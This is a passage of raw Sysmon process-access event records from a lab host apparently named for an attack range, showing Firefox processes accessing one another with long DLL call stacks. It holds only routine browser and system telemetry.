Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.599{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla 
Firefox\xul.dll+a803c9|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.583{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+f74b0e|C:\Program Files\Mozilla Firefox\xul.dll+1087037|C:\Program Files\Mozilla Firefox\xul.dll+11c4361|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+3b226|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla 
Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla 
Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla 
Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla 
Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program 
Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla 
Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla 
Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla 
Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.505{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla 